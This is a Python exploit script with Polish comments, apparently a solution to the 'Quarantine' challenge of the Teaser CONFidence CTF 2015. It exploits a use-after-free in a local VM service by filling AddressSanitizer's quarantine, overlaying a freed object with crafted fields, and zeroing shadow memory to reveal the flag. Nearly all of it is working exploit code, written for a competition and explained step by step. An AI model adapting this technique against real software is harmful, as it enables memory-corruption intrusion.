#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
  Nazwa pliku:      exploit.py
  Autor:            Mateusz Jurczyk
  Zadanie:          Quarantine
  Zawody:           Teaser CONFidence CTF 2015
  Kategoria:        Eksploitacja niskopoziomowa
  Punktacja:        500 pkt. (bardzo trudne)
  Liczba rozwiązań: 5 ze 160 drużyn
"""

import struct
import socket
import telnetlib

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer[-len(text):] != text:
    buffer += s.recv(1)
  return buffer

def add(s, name, program_length, program, array_length):
  read_until(s, "Option: ")
  s.send("add\n")
  s.send("%s\n" % name)
  s.send("%u\n" % program_length)
  s.send("%s\n" % program)
  s.send("%u\n" % array_length)
  read_until(s, "Done.")

def remove(s, idx):
  read_until(s, "Option: ")
  s.send("remove\n")
  s.send("%u\n" % idx)
  read_until(s, "Done.")

def change(s, idx, program):
  read_until(s, "Option: ")
  s.send("change\n")
  s.send("%u\n" % idx)
  s.send("%s\n" % program)
  read_until(s, "Done.")

def select(s, idx):
  read_until(s, "Option: ")
  s.send("select\n")
  s.send("%u\n" % idx)
  read_until(s, "Done.")

def run(s):
  read_until(s, "Option: ")
  s.send("run\n")

def give_flag(s):
  read_until(s, "Option: ")
  s.send("give_me_the_flag\n")

def fill_with_zeros_new_object(s, address, size):
  # Utwórz maszynę ("test1", 64, 1MB), która zostanie za chwilę użyta
  # po zwolnieniu.
  add(s, "test1", 64, "test", 1024 * 1024)

  # Utwórz kolejną maszynę po to, by sprowokować błąd, który ujawnia
  # się wyłącznie dla >1 elementów na liście.
  add(s, "test2", 10, "test", 10)

  # Wybierz maszynę "test1", która jest teraz druga na liście.
  select(s, 2)

  # Usuń maszynę "test1", powodując, że wskaźnik globals::current_vm
  # wskazuje na zwolnioną alokację.
  remove(s, 2)

  # Utwórz maszynę ("test3", 64, 1MB) i od razu ją zwolnij w celu
  # wypełnienia kwarantanny AddressSanitizera.
  add(s, "test3", 64, "test", 1024 * 1024)
  remove(s, 1)

  # Utwórz maszynę, dla której alokacja 64-bajtowego programu pokryje
  # się ze starym obiektem VMState, na który wskazuje zmienna
  # globals::current_vm. Pola struktury ustawiane są w następujący sposób:
  # 
  # ->array           = <adres do nadpisania zerami>
  # ->array_length    = <rozmiar regionu do nadpisania>
  # ->program         = NULL
  # ->program_length  = 0
  # ->array_idx       = 0
  # ->next            = NULL
  # ->name            = "\0"
  add(s, "exploit", 64, 
      struct.pack('<QIQIIQ', address, size, 0, 0, 0, 0), 1024 * 1024)

  # Wywołaj "uruchomienie" programu w nadpisanej strukturze VMState,
  # co poskutkuje wywołaniem funkcji vm::reset_state(), która
  # nadpisze wskazany przez nas adres zerami.
  run(s)

def fill_with_zeros_existing_object(s, idx, address, size):
  # Podmień zawartość istniejącej struktury VMState, na którą wskazuje
  # wskaźnik globals::current_vm.
  change(s, idx, struct.pack('<QIQIIQ', address, size, 0, 0, 0, 0))

  # Ponownie wywołaj "uruchomienie" maszyny o kontrolowanej strukturze
  # w celu nadpisania wskazanego regionu.
  run(s)

def main():
  # Połącz się z usługą po raz pierwszy by pobrać adres shadow
  # memory, który uniemożliwia nam użycie komendy
  # "give_me_the_flag".
  s = socket.socket()
  s.connect(("127.0.0.1", 10000))

  read_until(s, "Option: ")
  s.send("give_me_the_flag\n")
  read_until(s, "=>")
  stack_shadow_address = int(read_until(s, ": ")[:-2], 16)
  s.close()

  print "[+] Adres shadow memory stosu: %x" % (stack_shadow_address)

  # Połącz się z usługą po raz drugi by nadpisać region shadow memory
  # stosu i pobrać adres shadow memory pamięci statycznej, który
  # również musimy nadpisać, żeby ujawnić flagę.
  s = socket.socket()
  s.connect(("127.0.0.1", 10000))

  fill_with_zeros_new_object(s, stack_shadow_address, 17)
  give_flag(s)
  read_until(s, "=>")
  static_shadow_address = int(read_until(s, ": ")[:-2], 16)
  s.close()

  print "[+] Adres shadow memory pamieci statycznej: %x" %\
        (static_shadow_address)

  # W końcu połącz się po raz ostatni, nadpisując oba regiony shadow
  # memory i prosząc o flagę, która powinna zostać pomyślnie wypisana
  # przez program.
  s = socket.socket()
  s.connect(("127.0.0.1", 10000))

  fill_with_zeros_new_object(s, stack_shadow_address, 17)
  fill_with_zeros_existing_object(s, 1, static_shadow_address, 33)
  give_flag(s)

  # Przejdź w tryb interaktywny.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

if __name__ == "__main__":
  main()

